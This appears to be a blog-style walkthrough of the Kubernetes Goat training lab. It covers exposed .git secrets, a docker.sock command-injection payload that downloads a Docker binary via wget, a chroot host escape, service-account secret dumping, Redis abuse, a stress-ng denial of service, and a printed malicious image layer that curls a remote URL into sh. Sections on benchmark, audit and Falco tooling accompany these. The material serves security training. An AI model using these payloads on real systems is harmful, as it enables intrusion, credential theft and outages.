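Sensitive keys in codebases

The site's landing page reads (translated):

Welcome to the build code service. This service is built with containers, using a CI/CD pipeline and modern toolsets such as Git, Docker, and AWS.

The target is a web application whose source code is exposed, and the leaked code contains sensitive keys.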



A directory brute-forcing tool such as dirsearch confirms that the .git directory is exposed; a suitable tool can then dump the repository.



Download the source code with git-dumper:



One commit stands out because it touches environment variables.

Check it out:

    $ git checkout d7c173ad183c574109cd5c4c648ffe551755b576

Compared with the original tree, there is now an extra hidden file, .env, which turns out to hold AWS keys:

    $ ls -a

Next, enter the pod:

    export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")

Then run trufflehog . to scan the repository:

    /app # trufflehog .

The tool can be installed with pip:

    pip install trufflehog
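To make the idea of secret scanning concrete, here is a minimal Python sketch of the kind of pattern matching such a scanner performs. It is not how trufflehog is implemented; the function name `find_aws_key_ids` and the sample text are hypothetical, and the sketch only covers the 20-character, `AKIA`-prefixed format of AWS access key IDs.

```python
import re

# AWS access key IDs for long-term credentials: "AKIA" plus 16 uppercase
# letters or digits. Real scanners check many more patterns than this one.
AWS_KEY_ID = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")


def find_aws_key_ids(text):
    """Return every substring of text that looks like an AWS access key ID."""
    return AWS_KEY_ID.findall(text)


if __name__ == "__main__":
    # Hypothetical .env content; the key is AWS's documented example value.
    sample = "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
    for key_id in find_aws_key_ids(sample):
        print("possible AWS key ID:", key_id)
```

Running this over the output of `git show` for each commit would approximate a history scan, at the cost of missing anything that does not match the single pattern.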





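DIND (docker-in-docker) exploitation

This scenario is a command injection; once inside, we can see that docker.sock has been mounted into the container.

/var/run/docker.sock is the Unix domain socket that the Docker daemon listens on by default. If it is mounted into a container, we can talk to the Docker daemon from inside the container and run commands through it.

One way to exploit this is to download the static Docker binary. The payload below lists the images on the host:

    127.0.0.1;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz && tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/ ;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

A real attack would pull and run a chosen backdoor image, mounting the host's root directory / at /host inside the container, so that the backdoor container can modify files on the host (crontab, for example) and complete the escape.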
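Because the daemon speaks HTTP over that socket, the image listing can in principle be done without the docker binary. The following Python sketch assumes a Python interpreter is available in the container, which the source does not establish; `UnixHTTPConnection` and `list_image_tags` are hypothetical names, and the socket path is the one from the payload above.

```python
import http.client
import json
import socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that connects to a Unix domain socket instead of TCP."""

    def __init__(self, socket_path, timeout=5):
        # The host name is only used for the Host header.
        super().__init__("localhost", timeout=timeout)
        self.socket_path = socket_path

    def connect(self):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        sock.connect(self.socket_path)
        self.sock = sock


def list_image_tags(socket_path):
    """Ask the Docker daemon for its images (GET /images/json) and return the tags."""
    conn = UnixHTTPConnection(socket_path)
    try:
        conn.request("GET", "/images/json")
        images = json.loads(conn.getresponse().read())
    finally:
        conn.close()
    # RepoTags can be null for untagged images.
    return [tag for image in images for tag in (image.get("RepoTags") or [])]


if __name__ == "__main__":
    for tag in list_image_tags("/custom/docker/docker.sock"):
        print(tag)
```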

The directory mapping is also visible in the configuration file:





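SSRF in Kubernetes (K8S)

This is an internal API proxy listening on port 5000.

It reveals a service named metadata-db.

Digging deeper leads to http://metadata-db/latest/secrets/kubernetes-goat

Decode the value:

    echo "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d

Container escape to the host system

To support finer-grained privilege requirements, Linux has, since kernel 2.2, split the superuser's privileges into smaller units called capabilities. For example, CAP_CHOWN allows arbitrary changes to a file's UID and GID, i.e. running chown. Almost every superuser privilege has been broken out into its own capability.

Inside a Docker container, capsh --print lists the capabilities:

    root@nsfocus:/# capsh --print

Compared with the output on an ordinary machine there is hardly any difference: this is root with all capabilities.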
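When capsh is not installed, the same information can be recovered from the `CapEff` line of /proc/self/status, which holds the effective capability set as a hex bitmask. The Python sketch below decodes such a mask; the function names are hypothetical, and the name table follows the bit numbering in the Linux capability header up to CAP_CHECKPOINT_RESTORE (bit 40).

```python
# Capability names indexed by bit number.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(mask):
    """Return the names of the capabilities whose bits are set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def effective_caps(status_text):
    """Decode the CapEff line from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(int(line.split()[1], 16))
    return []


if __name__ == "__main__":
    with open("/proc/self/status") as status:
        caps = effective_caps(status.read())
    print(len(caps), "effective capabilities")
    print("CAP_SYS_ADMIN present:", "CAP_SYS_ADMIN" in caps)
```

A container started with Docker's default settings typically reports the mask `00000000a80425fb`, which decodes to 14 capabilities and excludes CAP_SYS_ADMIN; seeing CAP_SYS_ADMIN in the list is a strong hint that the container is privileged.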





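The mount command shows that a /host-system directory is mounted.

df shows it too, although df alone does not tell us whether it is a mount.

Judging by the name, it should be a host directory. Listing it suggests that the host's entire root filesystem has been mapped in:

    root@nsfocus:~# ls /host-system/

With chroot we get command execution on the host:

    root@nsfocus:~# chroot /host-system/ bash

We can also control and inspect the cluster with kubectl (the kubeconfig file must be given explicitly):

    root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pods

Looking at the deployment YAML, besides mounting the root directory at /host-system, the securityContext also sets allowPrivilegeEscalation: true and privileged: true. Both are dangerous, comparable to Docker's --privileged flag.

    root@k8s-master:~/kubernetes-goat/scenarios/system-monitor# cat deployment.yaml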
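The three settings called out above can be checked mechanically. As a rough sketch, the Python function below takes a pod spec as a dict (for example the `spec.template.spec` part of `kubectl get deployment <name> -o json`) and reports them; the function name and the sample spec are hypothetical and not taken from the scenario's actual manifest.

```python
def risky_settings(pod_spec):
    """Return human-readable findings for a pod spec given as a dict."""
    findings = []
    for volume in pod_spec.get("volumes", []):
        host_path = (volume.get("hostPath") or {}).get("path")
        if host_path == "/":
            findings.append(f"volume {volume['name']} mounts the host root")
    for container in pod_spec.get("containers", []):
        context = container.get("securityContext") or {}
        for flag in ("privileged", "allowPrivilegeEscalation"):
            if context.get(flag):
                findings.append(f"container {container['name']} sets {flag}: true")
    return findings


if __name__ == "__main__":
    # Hypothetical spec mirroring the settings described in the text.
    spec = {
        "volumes": [{"name": "host-filesystem", "hostPath": {"path": "/"}}],
        "containers": [{
            "name": "system-monitor",
            "securityContext": {"privileged": True, "allowPrivilegeEscalation": True},
        }],
    }
    for finding in risky_settings(spec):
        print(finding)
```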

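Docker CIS benchmarks analysis

The Center for Internet Security (CIS) publishes security benchmarks: well-defined, unbiased, consensus-based industry best practices that help organizations assess and improve their security.

Docker Bench for Security is a script that checks for dozens of common best practices around deploying Docker containers in production. GitHub: https://github.com/docker/docker-bench-security

First deploy the Docker CIS benchmark container:

    kubectl apply -f scenarios/docker-bench-security/deployment.yaml

Enter the container:

    kubectl exec -it docker-bench-security-XXXXX -- sh

Run docker-bench-security.sh in ~/docker-bench-security to perform the checks.

The scenarios/docker-bench-security/deployment.yaml above works by mapping several host directories into the container and running the checks against them.

So we could equally download the script from GitHub and run it directly on the host.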

Kubernetes CIS benchmarks analysis

The previous section covered Docker; this one covers Kubernetes. GitHub: https://github.com/aquasecurity/kube-bench

Two commands are enough to deploy it:

    kubectl apply -f scenarios/kube-bench-security/node-job.yaml

In the YAML files, the two commands executed are command: ["kube-bench", "node"] and command: ["kube-bench", "master"].

However, the command in the YAML on GitHub has since changed:

    # https://github.com/aquasecurity/kube-bench/blob/main/job-master.yaml

After applying, a new job named kube-bench-node appears:

    root@k8s-master:~/kubernetes-goat# kubectl apply -f scenarios/kube-bench-security/node-job.yaml

But the pod's status is Error:

    root@k8s-master:~/kubernetes-goat# kubectl get pods

After changing the command, try again:

    root@k8s-master:~/kubernetes-goat# kubectl delete -f ./scenarios/kube-bench-security/node-job.yaml

Now it works, so it is best to use the latest configuration file:

    root@k8s-master:~/kubernetes-goat# kubectl get pods

The audit output can be read from the logs:

    kubectl logs -f kube-bench-XXX-xxxxx

Attacking private registry

Requesting /v2/_catalog returns all repositories:

    $ curl http://192.168.2.174:1235/v2/_catalog

Fetch the manifest of the second image:

    $ curl http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest

It contains environment variable information.
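Picking the environment variables out of the manifest by eye is tedious, so here is a small Python sketch that extracts them. It assumes the registry returns a schema 1 manifest, in which each `history` entry carries a `v1Compatibility` field holding a JSON string; the function name is hypothetical, and a schema 2 manifest would instead require fetching the separate config blob.

```python
import json


def env_from_manifest(manifest):
    """Collect Env entries from a schema 1 image manifest given as a dict."""
    env = []
    for entry in manifest.get("history", []):
        # v1Compatibility is itself a JSON document stored as a string.
        compat = json.loads(entry.get("v1Compatibility", "{}"))
        for item in (compat.get("config") or {}).get("Env") or []:
            if item not in env:
                env.append(item)
    return env


if __name__ == "__main__":
    import urllib.request

    url = "http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest"
    with urllib.request.urlopen(url) as response:
        for item in env_from_manifest(json.load(response)):
            print(item)
```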

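NodePort exposed services

A NodePort opens a proxy port on the cluster's nodes for a Service, so that the Service can be reached from the host network.

This cluster is set up locally without a public IP, so there is no EXTERNAL-IP:

    $ kubectl get nodes -o wide

By default the NodePort range is 30000-32767. Scan it with nmap, here using the internal IP as the target:

    $ nmap -T4 -p 30000-32767 192.168.2.172

Port 30003 turns out to be open:

    $ curl http://192.168.2.172:30003/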
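Where nmap is not available, a plain TCP connect scan over the default NodePort range does the same job, only more slowly. A minimal Python sketch, with hypothetical function and constant names and the node IP taken from the commands above:

```python
import socket

# Default NodePort range, both ends inclusive.
NODEPORT_RANGE = range(30000, 32768)


def open_ports(host, ports, timeout=0.3):
    """Return the ports on host that accept a TCP connection."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising.
            if sock.connect_ex((host, port)) == 0:
                found.append(port)
    return found


if __name__ == "__main__":
    print(open_ports("192.168.2.172", NODEPORT_RANGE))
```

The scan is sequential, so the timeout dominates the run time when closed ports are filtered rather than rejected.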

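Helm v2 tiller to PwN the cluster [deprecated]

This scenario has been deprecated in Kubernetes Goat, but it is still worth a look.

Helm is a package manager for deploying and managing applications on Kubernetes. Its default configuration and setup are insecure: an attacker who can access any pod, in a cluster without a network security policy (NSP), can gain full cluster access and take over cluster-admin privileges.

Start the environment:

    kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

By default, Helm v2 has a tiller component with full cluster-admin RBAC privileges.

This one currently has problems and I could not reproduce it. The idea is that kubectl get secrets -n kube-system is denied by default; deploying pwnchart with the help of helm and the tiller service grants cluster-admin to all default service accounts, after which kubectl get secrets -n kube-system succeeds.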

Analysing crypto miner container

We usually pull images from public container registries such as Docker Hub. An attacker can upload an image that runs a mining program to such a registry and have users mine on their behalf.

First list the jobs in the Kubernetes cluster:

    $ kubectl get jobs -A

kube-bench-node is the node benchmark check from earlier.

Get the job's details:

    $ kubectl describe job batch-check-job

Get the pods belonging to the job:

    $ kubectl get pods --namespace default -l "job-name=batch-check-job"

Print the pod's information as YAML:

    $ kubectl get pod batch-check-job-mrd2q -o yaml

batch-check-job uses the madhuakula/k8s-goat-batch-check image:

    $ kubectl get pod batch-check-job-mrd2q -o yaml | grep image

docker history shows the command executed in each layer of the image; --no-trunc prevents the output from being truncated.

(This has to be run on the node, because the image only exists there.)

    $ docker history --no-trunc madhuakula/k8s-goat-batch-check

This suspicious command shows up:

    /bin/sh -c apk add --no-cache htop curl ca-certificates && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup && rm -rf /tmp/*

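Kubernetes namespaces bypass

It is commonly assumed that resources deployed and managed in different Kubernetes namespaces are secure and cannot reach each other.

By default, however, Kubernetes uses a flat network architecture, which means any pod or service in the cluster can talk to any other.

By default, namespaces within a cluster have no network security restrictions. Anything in one namespace can communicate with other namespaces.

Start the environment:

    kubectl run --rm -it hacker-container --image=madhuakula/hacker-container -- sh

First edit /etc/zmap/blacklist.conf with vi and comment out the 10.0.0.0/8 line, otherwise the scan is refused:

    zmap -p 6379 10.0.0.0/8 -o results.csv

    ~ # ifconfig

    ~ # redis-cli -h 10.244.1.5

In the real world this is Redis unauthorized access. If the Redis server runs as root, an attacker can write an SSH public key for the root account and then log in to the victim server directly over SSH.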
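Whether a Redis instance accepts unauthenticated commands can be checked with a single PING. The Python sketch below sends it as an inline command and looks at the reply; the function names are hypothetical. A server that requires a password answers with an error such as `-NOAUTH Authentication required.` instead of `+PONG`.

```python
import socket


def is_unauthenticated_reply(reply):
    """True if the reply to PING shows the command was accepted without auth."""
    return reply.startswith(b"+PONG")


def probe_redis(host, port=6379, timeout=2.0):
    """Send an inline PING to host:port and report whether it was accepted."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"PING\r\n")
        return is_unauthenticated_reply(sock.recv(64))


if __name__ == "__main__":
    # Address taken from the redis-cli command above.
    print(probe_redis("10.244.1.5"))
```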

Gaining environment information

The Docker container ID can be read from /proc/self/cgroup:

    root@nsfocus:/home# cat /proc/self/cgroup

The same container shows up when running docker ps on the node:

    $ docker ps -a | grep 5702
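Extracting the ID can be scripted. The sketch below pulls 64-character hexadecimal IDs out of the cgroup file; the function name and the sample path layout are hypothetical. It relies on cgroup v1 style paths that embed the container ID; on hosts using cgroup v2 the file may contain only `0::/`, in which case nothing is found.

```python
import re

# A full Docker container ID: exactly 64 lowercase hex characters.
CONTAINER_ID = re.compile(r"(?<![0-9a-f])[0-9a-f]{64}(?![0-9a-f])")


def container_ids(cgroup_text):
    """Return the distinct container IDs found in the text of /proc/self/cgroup."""
    ids = []
    for line in cgroup_text.splitlines():
        match = CONTAINER_ID.search(line)
        if match and match.group(0) not in ids:
            ids.append(match.group(0))
    return ids


if __name__ == "__main__":
    with open("/proc/self/cgroup") as cgroup:
        for container_id in container_ids(cgroup.read()):
            # The short form is what `docker ps` prints.
            print(container_id[:12], container_id)
```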

Other information gathering:

    cat /proc/self/cgroup



The flag is right there in the environment variables.



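DoS the memory/CPU resources

If the YAML used for a Kubernetes deployment places no limits on resource usage, an attacker may be able to exhaust the resources of the pod/deployment and cause a denial of service against Kubernetes.

Here the stress-ng stress-testing tool is used to demonstrate this.

First look at the initial resource usage: CPU is at 0 and memory is under 10 MB.

    $ docker stats --no-stream | grep hunger

Run the command below to start the stress test. --vm 8 starts 8 workers that perform anonymous mmap, and --vm-bytes is the amount of memory each worker allocates. With 2G the machine's 16 GB of memory was not filled (only 2-3 GB were used), so I simply raised it to 16G. Finally, --timeout 60s stops the test after 60 seconds.

    stress-ng --vm 8 --vm-bytes 16G --timeout 60s

Below is a screenshot of htop on the node during the stress test.

Running docker stats | grep hunger on the node eventually stopped returning anything.

As a result, other pods may be unable to get the resources they need, failing to serve user requests or becoming extremely slow. On your own server this may mean a higher electricity bill; on a cloud service it may mean a more expensive invoice.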



Looking at the deployment YAML, the resource limits are commented out, although a limit of 1000G would be practically no limit anyway.
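Missing limits are easy to detect automatically. The Python sketch below takes a pod spec as a dict (for instance from `kubectl get deployment <name> -o json`) and lists containers that lack a CPU or memory limit; the function name and the sample values are hypothetical. It only checks that a limit exists, so an oversized value such as 1000G would still pass.

```python
def containers_without_limits(pod_spec):
    """Return (container name, missing resources) pairs for a pod spec dict."""
    missing = []
    for container in pod_spec.get("containers", []):
        limits = (container.get("resources") or {}).get("limits") or {}
        absent = [name for name in ("cpu", "memory") if name not in limits]
        if absent:
            missing.append((container["name"], absent))
    return missing


if __name__ == "__main__":
    # Hypothetical spec: one container with limits, one without.
    spec = {
        "containers": [
            {"name": "limited", "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}}},
            {"name": "unlimited", "resources": {}},
        ]
    }
    print(containers_without_limits(spec))
```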

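Hacker container

    kubectl run -it --rm hacker-container --image=madhuakula/hacker-container -- sh

Once the pod is up, amicontained can be used to assess the container's privileges and related information:

    ~ # amicontained

The bundled nikto can also be used for web vulnerability scanning, although the results do not look very useful:

    ~ # nikto.pl -host http://metadata-db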







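Hidden in layers

It is very easy to leave passwords, private keys, tokens and the like inside a Docker image.

The author set up a job called hidden-in-layers:

    $ kubectl get jobs

Check the deployment file to confirm the image name:

    $ cat ~/kubernetes-goat/scenarios/hidden-in-layers/deployment.yaml | grep image

On the node, inspect the image. docker inspect shows the final Cmd, but that is only a single command:

    $ docker inspect madhuakula/k8s-goat-hidden-in-layers | grep "Cmd" -A 5

We have already used docker history to view the command executed in each layer. Here it reveals a file, /root/secret.txt, that is deleted in a later layer:

    $ docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers

Another tool is https://hub.docker.com/r/alpine/dfimage, which is more thorough. It is built on https://github.com/P3GLEG/Whaler and can search for secret files (by saving the image to a file, unpacking it, and searching the contents) and print environment variables (obtained via docker inspect). For implementation details see https://github.com/P3GLEG/Whaler/blob/master/main.go and https://github.com/P3GLEG/Whaler/blob/master/scanner.go

    $ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"

The few lines after ADD secret.txt /root/secret.txt look slightly off, but this does not matter much.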



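While searching for dfimage I also found a GitHub project of the same name that reconstructs a Dockerfile from an image. It is based on docker history, which saves us from reconstructing it by hand:

    https://github.com/LanikSJ/dfimage/blob/3d55b88596d5eec8d4beff171ad5d4931043ad19/entrypoint.py#L17

In the result, the FROM line is clearly wrong, and the second line is not informative either:

    $ docker run -v /var/run/docker.sock:/var/run/docker.sock dfimage madhuakula/k8s-goat-hidden-in-layers:latest

All of this only tells us that the file exists; we still need its contents. Starting a container from the image will not help, because the file has already been deleted:

    $ kubectl run test --rm --restart=Never -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh

The file is still present in the layer just before the one that deletes it, so we can first save the whole image to a file:

    # root @ nsfocus in ~ [16:35:15]

Three of the layers here contain a layer.tar file. With so few, we could simply unpack them one by one and look for secret.txt.

But there is a tool that quickly identifies which layer ID's layer.tar holds the file: dive.

    wget https://github.com/wagoodman/dive/releases/download/v0.10.0/dive_0.10.0_linux_amd64.deb

Run it:

    dive madhuakula/k8s-goat-hidden-in-layers

From the screenshot below we can tell that the file is in 66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535.

Finally we obtain secret.txt:

    # root @ nsfocus in ~/hidden-in-layers [16:39:52]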
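The manual search through the layers can also be automated. The Python sketch below walks a saved image archive, opens every nested layer.tar, and returns the contents of a given file from each layer that still contains it. It assumes the older `docker save` layout with one `<layer id>/layer.tar` per layer, as seen above; newer Docker releases may write an OCI-style layout instead. The function name and the archive file name in the usage part are hypothetical.

```python
import io
import tarfile


def find_in_layers(image_archive, wanted):
    """Search every layer.tar in a saved image for the file path wanted.

    image_archive is a binary file object; returns (layer name, file bytes) pairs.
    """
    target = wanted.lstrip("/")
    hits = []
    with tarfile.open(fileobj=image_archive) as image:
        for member in image.getmembers():
            if not member.name.endswith("layer.tar"):
                continue
            # Load the nested archive into memory so it can be opened as a tar.
            layer_bytes = io.BytesIO(image.extractfile(member).read())
            with tarfile.open(fileobj=layer_bytes) as layer:
                for entry in layer.getmembers():
                    name = entry.name[2:] if entry.name.startswith("./") else entry.name
                    if entry.isfile() and name == target:
                        hits.append((member.name, layer.extractfile(entry).read()))
    return hits


if __name__ == "__main__":
    # Hypothetical file name for the archive produced by `docker save`.
    with open("hidden-in-layers.tar", "rb") as archive:
        for layer_name, content in find_in_layers(archive, "/root/secret.txt"):
            print(layer_name)
            print(content.decode(errors="replace"))
```

Reading each layer fully into memory keeps the sketch short; for large images, extracting layers to disk first would be the safer choice.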



RBAC least privileges misconfiguration

In the early days of Kubernetes there was no RBAC (role-based access control); ABAC (attribute-based access control) was used instead. Today RBAC makes it possible to enforce the principle of least privilege. Even so, permissions are sometimes granted too broadly.

The goal of this challenge is to find k8svaultapikey.

By default, Kubernetes stores the token and service account information at /var/run/secrets/kubernetes.io/serviceaccount/

    root@hunger-check-deployment-56d65977f6-k68g9:/# cd /var/run/secrets/kubernetes.io/serviceaccount/

Some of the directories and addresses are available in environment variables:

    root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep SERVICEACCOUNT

    export APISERVER=https://${KUBERNETES_SERVICE_HOST}

Now we can query the API server, and the response also reveals the server's real IP:

    $ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

Listing secrets at /api/v1/secrets (that is, across all namespaces) is denied:

    $ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

List the secrets in the current namespace:

    curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets

List the pods in the current namespace:

    curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods

    $ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey

The value looks like base64:

    $ echo "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=" | base64 -d
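The curl calls and the base64 step can be combined into one script. The Python sketch below builds the authenticated request, then finds and decodes a key from the returned secret list. The function names are hypothetical, and the usage part assumes it runs inside a pod where the service account files and the `KUBERNETES_SERVICE_HOST` variable are present.

```python
import base64
import json
import os
import ssl
import urllib.request

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"


def api_request(apiserver, path, token):
    """Build a GET request for the API server with a bearer token."""
    request = urllib.request.Request(apiserver + path)
    request.add_header("Authorization", f"Bearer {token}")
    return request


def decode_secret_value(secret_list, key):
    """Return the base64-decoded value of key from a SecretList dict, or None."""
    for item in secret_list.get("items", []):
        value = (item.get("data") or {}).get(key)
        if value is not None:
            return base64.b64decode(value).decode()
    return None


if __name__ == "__main__":
    with open(f"{SA_DIR}/token") as token_file:
        token = token_file.read().strip()
    with open(f"{SA_DIR}/namespace") as namespace_file:
        namespace = namespace_file.read().strip()
    apiserver = "https://" + os.environ["KUBERNETES_SERVICE_HOST"]
    # Trust the cluster CA, like curl's --cacert option.
    context = ssl.create_default_context(cafile=f"{SA_DIR}/ca.crt")
    request = api_request(apiserver, f"/api/v1/namespaces/{namespace}/secrets", token)
    with urllib.request.urlopen(request, context=context) as response:
        print(decode_secret_value(json.load(response), "k8svaultapikey"))
```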

Looking back at the deployment YAML, the role grants get, watch, and list on all resources.

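KubeAudit - Auditing Kubernetes clusters

kubeaudit is an open-source tool that requires cluster administrator privileges. The tiller account has them, so the hacker container is started with tiller as its service account; in my environment, however, this account does not exist.

    $ kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash

I find Local Mode the most convenient: download the binary on the master and run it directly.

    $ ./kubeaudit all

Judging by the results, the tool checks resources of type Namespace, Deployment, DaemonSet, and Job.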



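Falco - Runtime security monitoring & detection

Helm v3 is required; installation instructions: https://helm.sh/docs/intro/install/

Add the Helm chart repository and install Falco into the Kubernetes cluster:

    helm repo add falcosecurity https://falcosecurity.github.io/charts

    # root @ k8s-master in ~/kubernetes-goat/kubeaudit [14:39:48]

Falco can detect and alert on any behavior that involves making Linux system calls. Alerts can be triggered by specific system calls, their arguments, and properties of the calling process. For example, Falco can easily detect events including but not limited to:

- A shell is run inside a container or pod in Kubernetes.

- A container is running in privileged mode, or is mounting a sensitive path such as /proc.

- An unexpected child process is spawned.

- A sensitive file, such as /etc/shadow, is read unexpectedly.

- A non-device file is written to /dev.

- A standard system binary, such as ls, makes an outbound network connection.

- A privileged pod is started in a Kubernetes cluster.

Check the status of the Falco pods:

    kubectl get pods --selector app=falco

Fetch the logs from Falco:

    kubectl logs -f -l app=falco

Now start a madhuakula/hacker-container and read the sensitive file /etc/shadow to see whether Falco detects it:

    kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash

Because of output buffering, logs fetched manually may lag behind; to see results sooner, run the command several times.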





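Popeye - A Kubernetes cluster sanitizer

Popeye is a utility that scans a live Kubernetes cluster and reports potential issues with deployed resources and configurations.

The issues it can detect are listed under the Sanitizers heading at https://popeyecli.io/

Download:

    wget https://github.com/derailed/popeye/releases/download/v0.10.0/popeye_Linux_x86_64.tar.gz

Just run the binary.

At the end it even gives your cluster a score.

Secure network boundaries using NSP

Create the lab environment by starting an nginx pod:

    kubectl run --image=nginx website --labels app=website --expose --port 80

Start another pod and try to reach this nginx; the request succeeds:

    $ kubectl run --rm -it --image=alpine temp -- sh

Create a network policy file, website-deny.yaml:

    $ cat website-deny.yaml

    $ kubectl apply -f website-deny.yaml
    networkpolicy.networking.k8s.io/website-deny created

Start another temporary pod and try to access the service again.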
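The contents of website-deny.yaml are not shown above. As an assumption about what such a policy typically looks like, the Python sketch below builds a NetworkPolicy that selects the pods labeled app=website and allows no ingress at all, then prints it as JSON, which `kubectl apply -f` accepts as well as YAML. The function name is hypothetical, and the policy is a common deny-all-ingress pattern rather than the author's actual file.

```python
import json


def deny_all_ingress(name, app_label):
    """Build a NetworkPolicy dict that blocks all ingress to pods with app=app_label."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": name},
        "spec": {
            # Applies to the nginx pod created with --labels app=website.
            "podSelector": {"matchLabels": {"app": app_label}},
            # An empty ingress list means no inbound traffic is allowed.
            "ingress": [],
        },
    }


if __name__ == "__main__":
    print(json.dumps(deny_all_ingress("website-deny", "website"), indent=2))
```

Note that a NetworkPolicy only takes effect when the cluster's network plugin enforces it; with a plugin that does not, the policy is accepted but traffic still flows.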